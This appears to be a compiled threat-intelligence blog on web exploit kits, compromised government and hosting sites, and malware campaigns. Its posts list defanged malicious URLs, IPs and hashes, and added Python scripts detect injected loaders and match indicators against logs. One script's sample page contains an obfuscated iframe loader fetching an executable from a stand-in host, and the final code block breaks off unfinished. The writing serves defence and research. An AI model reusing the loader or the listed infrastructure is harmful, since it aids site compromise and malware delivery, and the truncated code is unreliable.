
Microsoft Releases Its MSRC Researcher Recognition Program Award Winners - An Analysis

November 28, 2021

Microsoft has recently released its MSRC Researcher Recognition Program Award Winners, covering several key vulnerability research categories across a variety of Microsoft online platforms, products and services. Researchers contribute their knowledge and know-how by sharing actionable intelligence and actual PoC (Proof of Concept) code capable of exploiting vulnerabilities in various Microsoft products and services, and earn a reward in return.

These internal bug-bounty programs, together with public and private sector, including crowd-sourced, vulnerability research programs, help Microsoft secure its products and services, while the company publicly offers researcher and contributor recognition that can greatly contribute to a researcher's portfolio of research services.

The company is poised to make an additional impact by publicly promoting the MSRC Researcher Recognition Program Award Winners, including its active collaboration with TrendMicro's Zero Day Initiative.

The more the merrier.

Rogue "Malware Spreading Security Researchers" Launch Malicious Social Engineering Campaign Against Legitimate Researchers - OSINT Analysis

February 05, 2021

Security researchers from Google have recently spotted and analyzed a currently circulating, social-engineering driven malware-spreading campaign that actively interacts with legitimate researchers on social media and via private channels for the purpose of tricking them into testing a supposedly newly discovered zero day flaw, which in reality drops malware on the affected hosts and phones back to a C&C server, potentially attempting to compromise the researchers in question.

Sample screenshots of the campaign currently in circulation:

Sample malicious MD5s known to have participated in the campaign:
MD5: 7fc2af97b004836c5452922d4491baaa
MD5: 6252cec30f4fb469aefa2233fe7323f8
MD5: 56018500f73e3f6cf179d3b853c27912
MD5: b52e05683b15c6ad56cebea4a5a54990
MD5: 9e9f69ed56482fff18933c5ec8612063
MD5: f5475608c0126582081e29927424f338
MD5: ae17ce1eb59dd82f38efb9666f279044

Stay tuned!

Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons?

October 22, 2018
As ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems, software and/or devices, a logical question emerges regarding the program's usefulness, its potential benefits, and the potential vulnerabilities within the actual acquisition process: how would the program undermine the security industry, and what would be the eventual outcome for the security researcher in terms of fueling growth in the cyber warfare market segment?

In this post I'll discuss the market segment for pay-per-exploit acquisition programs, the current exploit-acquisition methodology utilized by different vendors, and the various over-the-counter acquisition methodologies applied by malicious attackers on their way to monetizing access to malware-infected hosts while compromising the confidentiality, availability and integrity of the targeted host, including a discussion of the ongoing and potential weaponization of zero day vulnerabilities in the context of today's cyber warfare world.

Having realized the potential of acquiring zero day vulnerabilities for the purpose of actively exploiting end users, malicious actors have long been aware of the over-the-counter acquisition market model, further enhancing their capabilities when launching malicious campaigns. Among the most widespread myths about zero day vulnerabilities is the belief that they are the primary growth factor of the cybercrime ecosystem, resulting in a multitude of malicious activity targeting end users.

With vendors continuing to establish the foundations for active vulnerability and exploit acquisition programs, third-party vendors and research organizations continue to successfully disintermediate the vendors' major acquisition programs, resulting in the launch of third-party services and products that further populate the security industry. These third parties potentially acquire "know-how" and relevant vulnerability and exploit information from major vendors, launch related companies and services, and potentially empower third-party researchers, vendors and individuals, including nation-state actors, with weaponization capabilities, potentially leading to successful target-acquisition practices on behalf of third-party researchers and individuals.


Becoming a target in the widespread context of third-party vendors and researchers might not be the wisest approach when it undermines in-house research and benchmarking activities in terms of evaluating and responding to vulnerabilities and exploits. Vendors looking for ways to efficiently improve the overall security of their products should consider basic internal benchmarking practices, and should also consider an incentive-based, revenue-sharing vulnerability and exploit reward program that provides company employees and researchers with the necessary tools and incentives to find, discover and report security vulnerabilities and exploits.

Something else worth pointing out in terms of vulnerability research and exploit discovery is the life-cycle of a zero day vulnerability and exploit. It is best described as a long-run process: malicious and fraudulent actors utilize client-side exploits to drop malicious software on the hosts of targeted victims, and these exploits often rely on outdated and already patched vulnerabilities. The overall misunderstanding that zero day vulnerabilities and exploits are the primary growth factor of the security industry coexists with the basic fact, of which end users and enterprises are often unaware, that cybercriminals rely on outdated and patched vulnerabilities to successfully target thousands of users globally on a daily basis.

What used to be a market segment dominated by DIY (do-it-yourself) exploit and malware-generating tools is today's modern market segment dominated by Web malware exploitation kits, successfully affecting thousands of users globally on a daily basis. Among the most common misconceptions regarding such kits is that the cybercriminals behind them rely on newly discovered exploits and vulnerabilities; in fact they rely on outdated and already patched security vulnerabilities and exploits for the purpose of successfully enticing thousands of users globally into falling victim to social-engineering driven malicious and fraudulent campaigns.

Despite the evident usefulness of zero day vulnerabilities from a malicious actor's point of view when launching malicious campaigns, malicious actors continue utilizing outdated vulnerabilities, further utilizing a multitude of social engineering attack vectors to enhance the usefulness of the exploitation vector. Another crucial aspect of the pay-per-exploit acquisition vulnerability model is the reliance on outdated and unpatched vulnerabilities for the purpose of launching malicious campaigns, which in turn relies on the basic fact that on the majority of occasions end users fail to update their third-party applications, exposing themselves to a variety of successful malicious campaigns utilizing outdated and unpatched vulnerabilities.

We expect to continue observing an increase in the pay-per-exploit acquisition model, with related acquisition model participants continuing to acquire vulnerabilities and further fueling growth in the market segment. We expect that malicious actors will adequately respond through over-the-counter acquisition models, including the utilization of outdated and unpatched vulnerabilities. End users are advised to keep their third-party applications updated, to build a general security awareness, and to ensure that they're running a fully patched antivirus solution.

Consider going through the following related posts:
Researchers spot new Web malware exploitation kit
Web malware exploitation kits updated with new Java exploit
Which are the most commonly observed Web exploits in the wild?
Report: Patched vulnerabilities remain prime exploitation vector
Report: malicious PDF files becoming the attack vector of choice
Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit
56 percent of enterprise users using vulnerable Adobe Reader plugins
Report: third party programs rather than Microsoft programs responsible for most vulnerabilities
Report: 64% of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege accounts
Secunia: popular security suites failing to block exploits
37 percent of users browsing the Web with insecure Java versions
Report: Malicious PDF files comprised 80 percent of all exploits for 2009
Secunia: Average insecure program per PC rate remains high

Historical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation - 2007

October 22, 2018
Dear blog readers, it's been several years since I last posted a quality update following my 2010 disappearance. As it's been quite a significant period of time since I last posted a quality update, I feel it's about time I post a quality update by detailing the Web Malware Exploitation market segment circa 2007, prior to my visit to the GCHQ as an independent contractor with the Honeynet Project.

In this post I'll discuss the rise of Web malware exploitation kits circa 2007 and offer in-depth discussion on the current and emerging tactics, techniques and procedures (TTPs) of the cybercriminals behind them. With cybercriminals continuing to actively rely on the exploitation of patched and outdated vulnerabilities, and with end users continuing to actively utilize unpatched and outdated third-party software, it shouldn't be surprising that today's botnets remain relatively easy to generate and orchestrate for the purpose of committing financial fraud.

Malicious Economies of Scale literally means utilizing attack techniques and exploitation approaches to efficiently, yet cost and time effectively, infect or abuse as many victims as possible, in a combination with an added layer of improved metrics on the success of the campaigns. What are the most popular web exploitation kits that malicious parties use to achieve this? Which are the most popular vulnerabilities used in the majority of the kits? What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat SEO (search engine optimization).

An overview of the threats posed by the rising number of malware embedded sites, with a discussion of the exploitation techniques and kits used, as well as detailed summaries of all the high-profile attacks of this kind during 2007.

01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities

2007 was the year in which client-side vulnerabilities significantly replaced server-side ones as the preferred choice of malicious attackers on their way to achieving the highest possible attack success rate, while keeping their investment in terms of know-how and personal effort to a minimum. Among the most successful such attacks during 2007 was Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities can result in aggregating the world’s largest botnet, according to industry and independent researchers’ estimates. By itself, this attack technique is in direct contradiction with the common wisdom that zero day vulnerabilities are more dangerous than already patched ones; however, the gang behind Storm Worm quickly recognized this biased statement as false, and by standardizing the exploitation process with the help of outdated vulnerabilities achieved an enormous success.

Years ago, whenever a vulnerability was found and exploit code was released in the wild, malicious attackers used to quickly release a do-it-yourself exploitation kit to take advantage of that single exploit only. Nowadays, that’s no longer the case, since by using a single exploit, whether an outdated or a zero day one, they’re significantly limiting the probability of a successful attack; therefore, the more diverse and served on-the-fly the set of exploits used in an attack is, the higher the success rate will be.

What was even more interesting to monitor during 2007 was the rise of high-profile sites serving malware, and the decline of malware coming from bogus ones. From the Massive Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy in the U.K, the U.S Consulate in St. Petersburg, China’s CSIRT, Possibility Media’s entire portfolio of E-zines, to the French government’s site related to Libya, these trusted web sites were all found to serve malware through an embedded link pointing back to the attacker’s malicious server. Let’s clarify what malicious economies of scale means, and how they do it.

02. What is malicious economies of scale, and how is it achieved?

Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users by standardizing the exploitation process, and by doing so not just lowering the entry barriers into the process of exploiting a large number of users, but also maintaining a rather static success rate of infections. Malicious economies of scale is the efficient way by which a large number of end users get infected, or otherwise abused online, with the malicious parties maintaining a static attack model. It’s perhaps more important to also describe how the process is achieved in the first place. The first strategy applied has to do with common sense in respect to the most popular software applications present at the end user’s end, and the first touch-point in this case would be the end user’s Internet browser.

Detecting the browser’s version and serving an exploit that directly matches the vulnerable version is among the web exploitation kits’ main functionalities. Let’s continue with the second strategy, namely increasing the probability of success. As I’ve already pointed out, do-it-yourself single-vulnerability exploiting tools matured into web malware exploitation kits, now backed by a diverse set of exploits targeting different client-side applications, which is what increases the probability of a successful infection. The third strategy has to do with attracting traffic to the malicious server, which, as I’ve already discussed, is already automatically set up to anticipate the upcoming flood of users and serve the malware by exploiting client-side software vulnerabilities on their end. This is mainly done by exploiting remote file inclusion vulnerabilities within the high-profile targets, or remotely exploitable web application vulnerabilities, to embed a single line of code or an obfuscated JavaScript that, when deobfuscated, loads the malicious URL while the legitimate site is loading.

Popular Malware Embedded Attack Tactics

This part of the article will briefly describe some of the most common attack tactics malicious parties use to embed links to their malicious servers on either high-profile sites, or any other site with a high pagerank, something they’ve recently started measuring, according to threat intel assessments of an automated system that embeds links based on a site’s popularity.
  • The “pull” Approach – Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site
In this tactic, malicious parties entirely rely on the end users to reach their malicious server, compared to the second tactic of “pushing” the malicious links to them. This is primarily accomplished through the use of Blackhat SEO tools generating junk content with the idea of attracting search engine traffic for popular queries, thus infecting anyone who visits the site; such pages often appear within the first twenty search results. The second such “pull” approach is harnessing the already established trust of a site such as a major news portal, and by embedding a link that automatically loads on the portal, having the users actually “pull” the malware for themselves.
  • The “push” Approach – Here’s Your Malware Embedded Link
The “push” approach’s success relies in its simple logic, with end users still worrying about downloading or clicking on email attachments given the overall lack of understanding on how to protect from sites serving malware, it’s logical to consider that basically sending a link which once visited will automatically infect the visitor though exploiting a client-side vulnerability, actually works. Storm Worm is the perfect example, and to demonstrate what malicious economies of scale means once again, it’s worth mentioning Storm’s approach of having an already infected host act as an infection vector itself, compared to its authors having to register multiple domains and change them periodically. The result is malware embedded links exploiting client-side vulnerabilities in the form of an IP address, in this case an already infected host that’s now aiming to infect another one
  • Automatically Exploiting Web Application Vulnerabilities – Mass SQL Injection Attacks
As I’ve already pointed out, malicious parties are not just efficiently scanning for remotely exploitable web application vulnerabilities or looking for ways to remotely include files on any random host, they’ve started putting efforts into analyzing the page rank, and overall popularity of a site they could exploit. This prioritizing of the sites to be used for a “pull” tactic is aiming to achieve the highest possible success rate by targeting a high-trafficked site, where even though the attack can be detected, the “window of opportunity” while the users were also accessing the malicious server could be far more beneficial than having a permanent malware link on a less popular site for an indefinite period of time.
  • Malicious Advertisements - Malvertising
Among the most popular traffic acquisition tactics nowadays remain the active utilization of legitimate Web properties for the purpose of socially engineering an ad network provider into featuring a specific malware-serving advertising at the targeted Web site including active Web site compromise for the purpose of injecting rogue and malicious ads on the targeted host.
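The embedding step described above (a single injected line or an obfuscated script that loads the attacker's URL while the legitimate page renders) is also what a site owner can look for. The following Python script is an added defensive example, not code from the original article: it parses a page's HTML and flags two injection shapes, a zero-sized or hidden iframe pointing at a third-party host, and an inline script that hides its loader URL behind percent- or hex-encoding fed to unescape()/eval()/document.write. The sample page and every hostname in it are constructed for the demo.

```python
"""Heuristic scan for concealed third-party loaders injected into a web page.

Added example (not from the original post).  Uses only the standard library so it
can run against saved HTML offline; all sample markup below is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Inline styles commonly used to keep an injected frame out of sight.
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# Functions that turn an encoded string back into markup/code at runtime.
DECODER_RE = re.compile(
    r"\b(?:unescape|eval|document\.write|String\.fromCharCode)\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


class _PageCollector(HTMLParser):
    """Collects <iframe> attributes and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None


def _zero_sized(attrs):
    """True when width or height is declared as 0 or 1 pixel."""
    for key in ("width", "height"):
        m = re.match(r"\s*(\d+)", attrs.get(key, ""))
        if m and int(m.group(1)) <= 1:
            return True
    return False


def _decode_js_literals(script):
    """Undo the cheap encodings kits relied on: %XX percent-encoding and \\xNN escapes."""
    decoded = unquote(script)
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), decoded)


def scan_html(html, page_host):
    """Return findings for external resources the page loads in a concealed way."""
    collector = _PageCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        concealed = _zero_sized(attrs) or bool(
            HIDDEN_STYLE_RE.search(attrs.get("style", "")))
        if host and host != page_host and concealed:
            findings.append({"kind": "hidden_iframe", "host": host, "url": src})
    for script in collector.scripts:
        if not DECODER_RE.search(script):
            continue  # nothing is decoded at runtime; plain script
        for url in URL_RE.findall(_decode_js_literals(script)):
            host = (urlparse(url).hostname or "").lower()
            if host and host != page_host:
                findings.append({"kind": "obfuscated_loader", "host": host, "url": url})
    return findings


# Constructed sample: a legitimate portal page carrying two injected loaders.
SAMPLE_PAGE = """<html><body>
<h1>Example News Portal</h1>
<iframe src="http://news.example/weather" width="300" height="200"></iframe>
<iframe src="http://loader.example/in.cgi?2" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>var counter = 1;</script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fdropzone.example%2Fcounter%2Fgetexe.php%22%20width%3D0%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, "news.example"):
        print(f"{f['kind']:18} {f['host']:20} {f['url']}")
```

The checks are deliberately conservative: an iframe is reported only when it is both external and concealed, and a script only when a runtime decoder is present and the decoded text yields an external URL, which keeps ordinary analytics snippets out of the findings while catching the single-line injections the text describes.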

Related posts:
  • Buying Access to Hacked Cpanels or Web Servers
Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture, including the active utilization of various DIY Web site exploitation and malware-generating tools, cybercriminals continue actively utilizing stolen and compromised accounting data for the purpose of injecting malicious scripts on the targeted host, further compromising the confidentiality, availability and integrity of the targeted host.
  • Harvesting accounting data from malware infected hosts
Having administrator access to a domain portfolio, or any type of access through a web application backdoor or direct FTP/SSH, reached its commercial level a long time ago. In fact, differentiated pricing applies in this case, on the basis of a site’s page rank, whereas I’ve stumbled upon great examples of “underground goods liquidity” as a process, where access to a huge domain portfolio through hacked Cpanels is being offered for cents, with the seller’s main concern being that cents are better than nothing, nothing in the sense that she may lose access to the Cpanel before it is sold and thus end up with nothing. Now, let’s discuss the most popular malware exploitation kits currently in the wild.

The Most Popular Web Malware Exploitation Kits

Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation kits could be irrelevant from the perspective of their current state of “modularity”, that is, while the default installation of a kit contains a rather modest set of exploits, adding new exploits has long reached the point’n’click stage. Even worse, localizing the kits to different languages further contributes to their ease of use and acceptance on a large scale, just as their open source nature makes it easy for coders to use a successful kit’s modules as a foundation for a new one, something that’s happening already, namely the difference between a copycat kit and an original one coded from scratch. Among the most popular malware kits remain:
  • A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack
During 2007, Mpack emerged as the most popular malware exploitation kit. Originally available for purchase, by the time copies of the kit started leaking out, anyone from a script kiddie to a pragmatic attacker had obtained a copy of it. Mpack’s main strength is its well configured default installation, which in combination with a rather modest, but then again modular, set of included exploits, as well as its point’n’click level of sophistication, automatically turned it into the default malware kit. Mpack has been widely used in nearly all of the high-profile malware embedded attacks during 2007; however, its popularity resulted in way too much industry attention towards its workings, and therefore malicious parties started coming up with new kits, still using Mpack as the foundation, at least from a theoretical perspective.

The list is endless: the Nuclear Malware kit, Metaphisher, an old version of the WebAttacker and the Rootlauncher kit, with the latest and most advanced innovation named the Random JS Exploitation Kit. Compared to the previous ones, this one goes a step beyond the usual centralized malicious server.

With malicious parties now interested in controlling as many infected hosts with as little effort as possible, client-side vulnerabilities will continue to be largely abused in an efficient way through web malware exploitation kits in 2008. The events that took place during 2007 clearly demonstrate the pragmatic attack approaches malicious parties started applying, namely realizing that an outdated but largely unpatched vulnerability is just as valuable as a zero day one.

Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware

October 20, 2018
It's 2010 and I've recently intercepted a widespread Bebo malware-serving campaign successfully enticing users into interacting with fraudulent and malicious content, potentially compromising the confidentiality, availability and integrity of the targeted host and exposing it to a multitude of malicious software.

Sample malicious domains known to have participated in the campaign:
hxxp://boss.gozbest.net/xd.html - 216.32.83.110
hxxp://tafficbots.com/in.cgi?6
hxxp://bolapaqir.com/in.cgi?2
hxxp://mybig-porn.com/promo4/?aid=1339

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Chinese Government Sites Serving Malware

October 20, 2018
It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it.

Compromised Chinese government Web site:
hxxp://nynews.gov.cn

Sample malicious domains known to have participated in the campaign:
hxxp://game1983.com/index.htm
hxxp://sp.070808.net/23.htm
hxxp://higain-hitech.com/mm/index.html

Currently affected Chinese government Web sites:
hxxp://www.tgei.gov.cn/dom.txt - iframe - hxxp://www.b110b.com/chbr/110.htm?id=884191
hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - hxxp://nnbzc12.kki.cn/indax.htm
hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm
hxxp://xc.haqi.gov.cn/jay.htm - iframe - hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm
hxxp://www.whkx.gov.cn/mohajem.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits

October 19, 2018
According to security researchers the Gumblar botnet is making a comeback, successfully affecting thousands of users globally and potentially compromising the confidentiality, availability and integrity of the targeted host through a multitude of malicious domains serving client-side exploits that further drop malicious software on the affected hosts.

In this post we'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Malicious URLs known to have participated in the campaign:
hxxp://ncenterpanel.cn/php/unv3.php
hxxp://ncenterpanel.cn/php/p31.php

Related malicious MD5s known to have participated in the campaign:
MD5: 3f5b905c86d4dcaab9c86eddff1e02c7
MD5: 61461d9c9c1954193e5e0d4148a81a0c
MD5: 65cd1da3d4cc0616b4a0d4a862a865a6
MD5: 7de29e5e10adc5d90296785c89aeabce

Sample URL redirection chain:
hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.comi
hxxp://gumblar.cn/rss/?id=2
hxxp://gumblar.cn/rss/?id=3

Related malicious domains known to have participated in the campaign:
hxxp://martuz.cn - 95.129.145.58

With Gumblar making a comeback it's becoming evident that cybercriminals continue utilizing the usual set of malicious and fraudulent tactics for the purpose of spreading malicious software and affecting hundreds of thousands of legitimate Web sites in a cost-effective and efficient way.

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected

October 19, 2018
In 2008 it became evident that a widespread malware-embedded attack took place, successfully affecting hundreds of iPowerWeb customers and potentially exposing hundreds of legitimate Web sites to a multitude of malicious software, courtesy of HostFresh, a well known Russian Business Network hosting provider.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. We'll also establish a direct connection between the campaign's infrastructure and the Russian Business Network.

Malicious URL: hxxp://58.65.232.33/gpack/index.php

Related malicious URLs known to have participated in the campaign:
hxxp://58.65.232.25/counter/getexe.php?h=11
hxxp://58.65.232.25/counter/getfile.php?f=pdf

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - A Portfolio of Exploits Serving Domains

May 29, 2017
With the rise of Web malware exploitation kits continuing to proliferate, cybercriminals are poised to continue earning fraudulent revenue by monetizing access to malware-infected hosts, largely relying on the active utilization of client-side exploits to spread malicious software, potentially compromising the confidentiality, availability and integrity of the targeted host.

What used to be an ecosystem dominated by proprietary DIY (do-it-yourself) malware and exploit-generating tools is today's modern cybercrime ecosystem dominated by Web malware exploitation kits, successfully empowering novice cybercriminals with the necessary tactics, techniques and procedures for launching a fraudulent and malicious campaign potentially affecting hundreds of thousands of users globally.

In this post we'll provide actionable intelligence on currently active IcePack Web malware exploitation kit client-side exploit and malware-serving domains.

Related IcePack Web Malware Exploitation Kit domains:
hxxp://seateremok.com/xc/index.php
hxxp://lskdfjlerjvm.com/ice-pack/index.php  
hxxp://formidleren.dk/domain/mere.asp  
hxxp://webs-money.info/ice-pack/index.php  
hxxp://greeetthh.com/ice-pack1/index.php
hxxp://58.65.235.153/~pozitive/ice/index.php
hxxp://iframe911.com/troy/us/sp/ice/index.php
hxxp://themusicmp3.info/rmpanfr/index.php

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (lskdfjlerjvm.com):
MD5: 4c0958f2f9f5ff2e5ac47e92d4006452
MD5: d955372c7ef939502c43a71ff1a9f76e
MD5: 118e24ea884d375dc9f63c986a15e5df
MD5: e825a7e975a9817441da9ba1054a3e6f
MD5: 71460d4a1c7c18ec672fed56d764ebe6

Once executed, a sample malware (MD5: d955372c7ef939502c43a71ff1a9f76e) phones back to the following malicious C&C server IPs:
hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 109.70.26.37
hxxp://tableshown.net - 208.100.26.234
hxxp://leadshown.net
hxxp://tablefood.ru
hxxp://tablefood.net - 180.210.34.47
hxxp://leadfood.net
hxxp://tablemeet.net
hxxp://leadmeet.net
hxxp://pointneck.net
hxxp://pointshown.net
hxxp://callshown.net - 212.61.180.100
hxxp://callneck.ru
hxxp://callneck.net
hxxp://ringshown.ru
hxxp://ringshown.net
hxxp://noneshown.net

We'll continue monitoring the campaigns and post updates as soon as new developments take place.
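The indicator lists in this and the preceding Historical OSINT posts (defanged hxxp:// URLs, "domain - IP" pairs, "MD5:" lines and indented redirection chains) only become useful to a defender once they are normalized and matched against telemetry. The Python below is an added example, not code from the original posts: it parses that listing format into host, IP, URL and hash sets, then matches them against proxy log lines and a list of observed file hashes. The indicators and log lines embedded in it are constructed for the demo (reserved documentation address ranges and the .example TLD), and the proxy log layout is an assumption.

```python
"""Normalize OSINT-style indicator listings and match them against logs.

Added example (not from the original posts).  The listing format follows the
posts (hxxp:// URLs, 'domain - IP' pairs, 'MD5: ...' lines, indented chains);
the indicator values and the log lines are constructed for the demo.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

MD5_RE = re.compile(r"\bMD5:\s*([0-9a-fA-F]{32})\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DEFANGED_URL_RE = re.compile(r"\bhxxps?://\S+", re.I)
# Assumed proxy log shape: "<timestamp> <client> <method> <url> <status>"
PROXY_LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


@dataclass
class IndicatorSet:
    hosts: set = field(default_factory=set)
    ips: set = field(default_factory=set)
    md5s: set = field(default_factory=set)
    urls: set = field(default_factory=set)


def refang(url):
    """hxxp:// -> http:// so urlparse can read it; the URL is never fetched."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def parse_indicators(text):
    """Turn a defanged indicator listing into normalized lookup sets."""
    ind = IndicatorSet()
    for raw in text.splitlines():
        line = raw.strip(" \t-")  # redirection chains are indented "- hxxp://..."
        if not line:
            continue
        ind.md5s.update(h.lower() for h in MD5_RE.findall(line))
        ind.ips.update(IPV4_RE.findall(line))
        for url in DEFANGED_URL_RE.findall(line):
            clean = refang(url.rstrip(",;)"))
            host = urlparse(clean).hostname
            if host:
                ind.urls.add(clean)
                ind.hosts.add(host.lower())
    return ind


def _parent_domains(host):
    """The host plus each parent domain, so cdn.evil.example matches evil.example."""
    labels = host.split(".")
    return {".".join(labels[i:]) for i in range(max(len(labels) - 1, 1))}


def match_proxy_log(ind, lines):
    """Return (line, reason) for each proxy log line that touches a known indicator."""
    hits = []
    for line in lines:
        m = PROXY_LINE_RE.match(line)
        if not m:
            continue
        host = (urlparse(m.group("url")).hostname or "").lower()
        known_hosts = ind.hosts & _parent_domains(host)
        if known_hosts:
            hits.append((line, "host:" + min(known_hosts, key=len)))
        elif host in ind.ips:
            hits.append((line, "ip:" + host))
    return hits


def match_hashes(ind, observed_md5s):
    """Intersect observed file hashes (e.g. an EDR export) with the indicator set."""
    return sorted(ind.md5s & {h.lower() for h in observed_md5s})


# Constructed listing in the posts' format; all values are demo placeholders.
SAMPLE_INDICATORS = """Sample URL redirection chain:
hxxp://first-hop.example/x.html - 203.0.113.10
    - hxxp://second-hop.example/video7/?afid=24 - 198.51.100.7
        - hxxp://dropper.example/topic/exe.php?x=jjar

Related malicious MD5s known to have phoned back to the same C&C server IPs (203.0.113.10):
MD5: 0123456789abcdef0123456789abcdef
MD5: FEDCBA9876543210FEDCBA9876543210

Once executed, a sample malware phones back to the following C&C server IPs:
hxxp://callhome.example - 192.0.2.44
hxxp://beacon.example
"""

# Constructed proxy log lines: one clean request, three touching indicators.
SAMPLE_PROXY_LOG = [
    "2016-12-25T10:00:01Z 10.0.0.5 GET http://intranet.example/index.html 200",
    "2016-12-25T10:00:02Z 10.0.0.5 GET http://second-hop.example/video7/?afid=24 302",
    "2016-12-25T10:00:03Z 10.0.0.5 GET http://192.0.2.44/gate.php 200",
    "2016-12-25T10:00:04Z 10.0.0.9 GET http://cdn.beacon.example/ping 200",
]

if __name__ == "__main__":
    ind = parse_indicators(SAMPLE_INDICATORS)
    print(f"{len(ind.hosts)} hosts, {len(ind.ips)} IPs, {len(ind.md5s)} hashes")
    for line, reason in match_proxy_log(ind, SAMPLE_PROXY_LOG):
        print(reason, "<-", line)
```

Matching on parent domains is what makes a redirection-chain listing pay off: the posts record one path per hop, but the same hosts typically reappear under other subdomains and paths, so the host, not the full URL, is the indicator worth keeping.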

Historical OSINT - Hundreds of Malicious Web Sites Serve Client-Side Exploits, Lead to Rogue YouTube Video Players

December 25, 2016
In a cybercrime ecosystem dominated by hundreds of malicious software releases, cybercriminals continue actively populating a botnet's infected population, further spreading malicious software, potentially compromising the confidentiality, integrity and availability of the affected hosts, exposing the affected user to a multitude of malicious software, and earning fraudulent revenue in the process of monetizing access to the malware-infected hosts, largely relying on an affiliate-network based type of fraudulent revenue monetization scheme.

We've recently intercepted a currently circulating malicious spam campaign enticing users into clicking on bogus and rogue links, potentially exposing the confidentiality, integrity and availability of the affected hosts, ultimately attempting to socially engineer users into interacting with rogue YouTube Video Players that drop fake security software, also known as scareware, on the affected hosts, with the cybercriminals behind the campaign earning fraudulent revenue largely through an affiliate-network based type of monetization scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample URL redirection chain:
hxxp://acquaintive.in/x.html - 208.87.35.103
    - hxxp://xxxvideo-hlyl.cz.cc/video7/?afid=24 - 63.223.117.10
            - hxxp://binarymode.in/topic/j.php - 159.148.117.21 - Email: enquepuedo.senior@gmail.com
                - hxxp://binarymode.in/topic/exe.php?x=jjar
                    - hxxp://binarymode.in/topic/?showtopic=ecard&bid=151&e=post&done=image
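The indicator notation used throughout these posts (defanged hxxp:// URLs, the hosting IP after a dash, registrant e-mails, MD5s, indented redirection chains) is straightforward to turn into a detection feed. The Python below is an added example, not code from the original posts: it normalizes lines in that notation into domain, IP, MD5 and e-mail sets, routes IP-only hosts such as hxxp://91.201.196.99 to the IP set, and checks Squid-style proxy log lines against the result. The indicator values are quoted from the posts on this page; the log lines are constructed.

```python
import re
from dataclasses import dataclass, field

# Indicator lines quoted from the posts above, in their own notation: defanged
# hxxp:// URLs, hosting IPs after " - ", registrant e-mails, MD5s, chain indents.
INDICATOR_LINES = """
hxxp://acquaintive.in/x.html - 208.87.35.103
    - hxxp://xxxvideo-hlyl.cz.cc/video7/?afid=24 - 63.223.117.10
            - hxxp://binarymode.in/topic/j.php - 159.148.117.21 - Email: enquepuedo.senior@gmail.com
hxxp://info-get.ru - 31.31.204.161
hxxp://91.201.196.99
MD5: a12c055f201841f4640084a70b34c0c4
wemhkr3t4z.com - Email: fole@fox.net - MD5: 3b375fc53207e1f54504d4b038d9fe6b
pizzapluswindsor.ca - 50.116.6.57; 174.140.169.145
"""

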